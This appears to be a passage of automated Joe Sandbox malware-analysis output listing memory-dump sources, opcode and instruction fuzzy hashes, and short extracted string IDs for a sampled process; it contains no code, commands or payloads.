                                                                                                  • Instruction ID: fa4f920506d1e54855da4ba0a463c6ff73a0e0d9da2d1212d391bc6604b6c3e7
                                                                                                  • Opcode Fuzzy Hash: 35362582afb25bdbb09b1280a95f8a68633667d5fdcdd3202e28545ed4c7127c
                                                                                                  • Instruction Fuzzy Hash: 1B01A932F112349BCF59BA66EC4069E7776FB84714F108539E506DB344DB31A80587C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e2426413fbbe01b497a723931432b30be9b61fcbc96c216eb976e675400f958e
                                                                                                  • Instruction ID: 046db35e5d979578b2a4e42140908a2a441cc5020a320269f13ccb631d31d144
                                                                                                  • Opcode Fuzzy Hash: e2426413fbbe01b497a723931432b30be9b61fcbc96c216eb976e675400f958e
                                                                                                  • Instruction Fuzzy Hash: 21F0ED70D092886BDF52EB748D0529A7BBE9B83204F2048AAE444CB203E236CE00C791
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-3623093008
                                                                                                  • Opcode ID: e87a0655a84d03abe8a8c76c6328a2e57ca035f4c365a04e247ee5badd23a814
                                                                                                  • Instruction ID: 097c4037f246820d535838af6b3a26c0f28f9ace84712b742aacce557d78c145
                                                                                                  • Opcode Fuzzy Hash: e87a0655a84d03abe8a8c76c6328a2e57ca035f4c365a04e247ee5badd23a814
                                                                                                  • Instruction Fuzzy Hash: 69121C30E112598FDB64EF65C954AAEB7F2BF88305F208569D40AAB364DB30DD85CF80
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-634254105
                                                                                                  • Opcode ID: 2909eb266fcf852ef4497c0336d51f92d6bbec2239d01e3d96b500932c5a8d0e
                                                                                                  • Instruction ID: 826a32e8af6b931350328ea843437e08c0541d0c5f1030461236bc550df1f55d
                                                                                                  • Opcode Fuzzy Hash: 2909eb266fcf852ef4497c0336d51f92d6bbec2239d01e3d96b500932c5a8d0e
                                                                                                  • Instruction Fuzzy Hash: EB918E30A40219DFEBA8FFA5D95476EB7F6BF84301F208529E9059B398DB749D41CB80
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .5|q$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-3447281907
                                                                                                  • Opcode ID: d2602bb198c65afd74ef2f50a59852c07fc6d18a419b7cde83f66ab84c42652f
                                                                                                  • Instruction ID: e72a20a95ba10fe3e6b7c2cb8d8eb56b6b63f6ef36f760c0c173d4b7ff8b700a
                                                                                                  • Opcode Fuzzy Hash: d2602bb198c65afd74ef2f50a59852c07fc6d18a419b7cde83f66ab84c42652f
                                                                                                  • Instruction Fuzzy Hash: FCF13C30A00255CFDB59FB69D954B6EB7B7BF88345F208669D4059B398DB30EC42CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-185584874
                                                                                                  • Opcode ID: 00ef9fcdb6ec798044dfff1ac37fd0b11e1c5eb4f5ba99a33fd74776cdeb8431
                                                                                                  • Instruction ID: debc52541a27c1cccc9ee5cd337a8e643160f32104ee905fcacbf9558b029925
                                                                                                  • Opcode Fuzzy Hash: 00ef9fcdb6ec798044dfff1ac37fd0b11e1c5eb4f5ba99a33fd74776cdeb8431
                                                                                                  • Instruction Fuzzy Hash: B7B14C30E012198FDB99FF65D95069EB7B2FF88305F248529D4059B394DB79DC82CB80
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: LRdq$LRdq$$dq$$dq
                                                                                                  • API String ID: 0-340319088
                                                                                                  • Opcode ID: 862f48885a83e73a92336dced9951e16f818d865272ea4309d89969fba857674
                                                                                                  • Instruction ID: d85d85f000ad351cc58c0036845b0e22da79972b1ae8cbbf1416d28d4e651c69
                                                                                                  • Opcode Fuzzy Hash: 862f48885a83e73a92336dced9951e16f818d865272ea4309d89969fba857674
                                                                                                  • Instruction Fuzzy Hash: E251DF30B002119FDB59FB29D950A6AB7F6FF88300F148669E5069F3A9DB75EC40CB80